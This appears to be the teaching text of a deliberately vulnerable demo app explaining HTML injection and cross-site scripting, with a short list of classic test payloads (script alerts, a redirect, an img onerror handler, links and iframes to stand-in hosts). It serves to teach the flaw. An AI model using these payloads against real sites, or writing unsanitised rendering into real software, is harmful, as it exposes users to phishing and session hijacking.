Why This Is Dangerous

• 🚨 HTML Injection: This app directly renders your input into the DOM without sanitization.
• 📦 No Filtering: Attackers can inject <script>, <iframe>, or <a href> tags.
• 🔄 Open Redirects: Injecting JavaScript like window.location.href can redirect users to malicious websites.
• 🕳️ Impact: Leads to phishing, session hijacking, malware delivery, etc.

Try These Payloads:

• <script>alert('XSS Attack!')</script>
• <script>window.location.href='https://google.com'</script>
• <img src=x onerror='alert(1)'>
• <a href='https://malicious-site.com'>Click me!</a>
• <iframe src='https://evil.com'></iframe>